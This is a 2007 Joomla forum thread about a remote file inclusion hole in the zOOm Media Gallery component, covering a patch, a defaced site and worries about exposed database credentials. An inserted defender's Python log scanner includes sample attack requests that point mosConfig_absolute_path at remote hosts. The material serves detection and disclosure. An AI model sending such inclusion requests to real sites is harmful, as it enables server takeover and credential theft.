The Joomla! Forum ™





Posted: Sat Apr 14, 2007 12:26 pm
Joomla! Master

Joined: Fri Aug 12, 2005 7:19 am
Posts: 10525
Location: Leeds, UK
A vulnerability has been identified in zOOm Media Gallery, which could be exploited by remote attackers to execute arbitrary commands. This issue is due to an input validation error in the "lib/iptc/EXIF_Makernote.php" script that does not validate the "mosConfig_absolute_path" parameter, which could be exploited by remote attackers to include malicious PHP scripts and execute arbitrary commands with the privileges of the web server.

Source: http://www.frsirt.com/english/advisories/2007/1353

_________________
"Exploited yesterday... Hacked tomorrow"
Blog http://brian.teeman.net/
Joomla Hidden Secrets http://hiddenjoomlasecrets.com/
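
A defender's check for the issue described in the post above, added here as an example (not part of the original thread and not zOOm or Joomla code): it scans web server access logs for requests that pass `mosConfig_absolute_path` to `EXIF_Makernote.php`. The Apache combined log format and the sample lines are assumptions constructed for the example.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Script and parameter named in the advisory quoted in the post above.
SCRIPT = "lib/iptc/exif_makernote.php"
PARAM = "mosconfig_absolute_path"

# Assumed Apache common/combined format: ip - - [time] "METHOD target PROTO" status
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3})')
REMOTE_RE = re.compile(r"^[a-z][a-z0-9+.\-]*://", re.IGNORECASE)

# Constructed sample log lines; addresses and host names are documentation values.
SAMPLE_LOG = """\
192.0.2.10 - - [14/Apr/2007:12:00:01 +0000] "GET /index.php?option=com_zoom&Itemid=5 HTTP/1.1" 200 5120
198.51.100.7 - - [14/Apr/2007:12:03:44 +0000] "GET /components/com_zoom/lib/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://remote.example/x.txt HTTP/1.1" 200 312
198.51.100.7 - - [14/Apr/2007:12:03:50 +0000] "GET /components/com_zoom/lib/iptc/EXIF_Makernote.php?mosConfig%5Fabsolute%5Fpath=ftp%3A%2F%2Fremote.example%2Fx HTTP/1.1" 404 0
203.0.113.5 - - [14/Apr/2007:12:09:12 +0000] "GET /components/com_zoom/lib/iptc/EXIF_Makernote.php HTTP/1.1" 200 0
203.0.113.9 - - [14/Apr/2007:12:11:30 +0000] "GET /components/com_zoom/lib/iptc/EXIF_Makernote.php?mosConfig_absolute_path=/tmp HTTP/1.1" 200 0
"""


def find_inclusion_attempts(log_text):
    """Return one record per request that passes PARAM to SCRIPT in the query string."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, when, _method, target, status = m.groups()
        parts = urlsplit(target)
        # Decode and lower-case the path so encoded or mixed-case variants still match.
        if not unquote(parts.path).lower().endswith(SCRIPT):
            continue
        # parse_qsl decodes names and values, so mosConfig%5Fabsolute%5Fpath is caught.
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if name.lower() == PARAM:
                hits.append({
                    "ip": ip, "time": when, "status": int(status), "value": value,
                    # A scheme:// value points at a remote include source.
                    "remote": bool(REMOTE_RE.match(value)),
                })
    return hits


if __name__ == "__main__":
    for hit in find_inclusion_attempts(SAMPLE_LOG):
        print(hit)
```

Access logs hold only the query string, so a value sent in a POST body or cookie is not visible to this check.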


Posted: Sat Apr 14, 2007 9:17 pm
Joomla! Apprentice

Joined: Sat Aug 20, 2005 3:59 pm
Posts: 7
I already knew about this vulnerability in ZMG, and I fixed it a while back too... It just hasn't been released yet - because I didn't have the time to do it!

To be honest, I don't have the time anymore to work on ZMG. I need some developers... and fast! You know anyone? :P


Posted: Sat Apr 14, 2007 9:58 pm
Joomla! Master

Joined: Fri Aug 12, 2005 7:19 am
Posts: 10525
Location: Leeds, UK
Sorry Mike, not my strong point.

Maybe put a post asking for developers in another part of the forum.

Posted: Sun Apr 15, 2007 5:07 pm
Joomla! Fledgling

Joined: Mon Feb 26, 2007 7:13 am
Posts: 2
mikedeboer wrote:
I already knew about this vulnerability in ZMG, and I fixed it a while back too... It just hasn't been released yet - because I didn't have the time to do it!

To be honest, I don't have the time anymore to work on ZMG. I need some developers... and fast! You know anyone? :P

Hi Mike, where can I sign up?


Posted: Mon Apr 16, 2007 8:30 am
Joomla! Apprentice

Joined: Sat Aug 20, 2005 3:59 pm
Posts: 7
Thanks Brian, I will.

ZZzzzz wrote:
Hi Mike, where can I sign up?

If it's possible, could you send a short résumé (or something listing your experience) to 'mike AT zoomfactory DOT org'... or simply PM me :)


Posted: Mon Apr 16, 2007 1:13 pm
Joomla! Fledgling

Joined: Mon Feb 26, 2007 7:13 am
Posts: 2
To fix the security, please update the EXIF_Makernote.php and EXIF.php with the ones included in this attachment.
Put them in /components/com_zoom/lib/iptc/

A new release will be available soon on the zoom factory website:

http://www.zoomfactory.org


Posted: Thu May 03, 2007 10:44 pm
Joomla! Apprentice

Joined: Mon Dec 05, 2005 11:04 am
Posts: 12
brian wrote:
which could be exploited by remote attackers to include malicious PHP scripts and execute arbitrary commands with the privileges of the web server.


I suppose that includes putting an .asp file containing facilities to examine your site files and deface it anytime (see attached screenshot)? Or should I be looking for something else here?

It worries me that once they put that file on your site, they can get your db details from configuration.php. You can imagine they can get whatever ftp account details are stored unprotected in any of the php files, for example in file safemode.php which is used by ZoomGallery component for allowing image uploading when/if safe mode is set to on, which many hosting providers still do today...

Any solution to protecting the db account details? How does Joomla address this, i.e. information in configuration.php being exposed? I know upgrading to the latest Joomla version and the latest versions of 3rd party add-ons is critical but there will always be security flaws to fix surely.

Regards,

A.Fraile

EDIT MOD: image doing publicity for hacker removed. No need to help the hackers.  ;)


Last edited by infograf768 on Wed May 30, 2007 7:23 am, edited 1 time in total.

Posted: Sun Jul 08, 2007 11:10 am
Joomla! Apprentice

Joined: Thu Mar 30, 2006 10:55 am
Posts: 44
ZZzzzz wrote:
To fix the security, please update the EXIF_Makernote.php and EXIF.php with the ones included in this attachment.
Put them in /components/com_zoom/lib/iptc/. A new release will be available soon on the zoom factory website:
http://www.zoomfactory.org


Bit confused but if I understand right from Zoom forum messages.

1. The hack will not work if register globals is set off in both php as well as globals.php?
2. If using rc4 or prior your patch should be applied? Is the patch applied in the latest Zoom download on the Zoom website? Why is the patch not available from the official Zoom website?


Posted: Fri Dec 28, 2007 6:04 pm
Joomla! Fledgling

Joined: Fri Dec 28, 2007 5:55 pm
Posts: 3
Hi!!

Need urgent help! My site has been defaced! A gif picture had been added to the ZMG main page between 2 of my galleries. How can I get rid of it?


Posted: Fri Dec 28, 2007 7:35 pm
Joomla! Apprentice

Joined: Thu Mar 30, 2006 10:55 am
Posts: 44
cadenza wrote:
Hi!! Need urgent help! My site has been defaced! A gif picture had been added to the ZMG main page between 2 of my galleries. How can I get rid of it?


Can we have some more information: which version are you using, did you apply the security patch posted by Mike, your security settings, globals, etc.?


Posted: Sat Dec 29, 2007 4:16 am
Joomla! Fledgling

Joined: Fri Dec 28, 2007 5:55 pm
Posts: 3
I am currently using ver 2.5.1 RC1. Nope, yet to apply the files. Pardon me for asking, where can I find the 2 update files mentioned earlier on in this thread?

Any idea how I can remove the inserted gif in between my photo galleries? Which file has been changed in ZMG directory? I know the file name of the inserted picture but do seem to be able to locate it in my server directories/files...

Thanks in advance!


Posted: Sun Dec 30, 2007 1:25 pm
Joomla! Apprentice

Joined: Thu Mar 30, 2006 10:55 am
Posts: 44
cadenza wrote:
I am currently using ver 2.5.1 RC1. Nope, yet to apply the files. Pardon me for asking, where can I find the 2 update files mentioned earlier on in this thread? Any idea how I can remove the inserted gif in between my photo galleries? Which file has been changed in ZMG directory? I know the file name of the inserted picture but do seem to be able to locate it in my server directories/files...


There is a vulnerability [1] in all versions prior to 2.5.1 RC4. I would start by removing your current version, since it is hard to tell which files have been compromised, and load the latest version from the Zoom website [2]. For the patch posted in this thread you have to log in; the second message from ZZzzzz (April 16, 2007, 09:13:21 AM) contains the file.

[1] http://help.joomla.org/component/option,com_easyfaq/task,view/id,186/Itemid,268/
[2] http://www.zoomfactory.org/index.php?option=com_remository&Itemid=61&func=select&id=1


Posted: Sun Dec 30, 2007 2:37 pm
Joomla! Fledgling

Joined: Fri Dec 28, 2007 5:55 pm
Posts: 3
Thanks! But is there a way to do it so that my existing galleries will remain? I.e. upgrade instead of a re-installation?

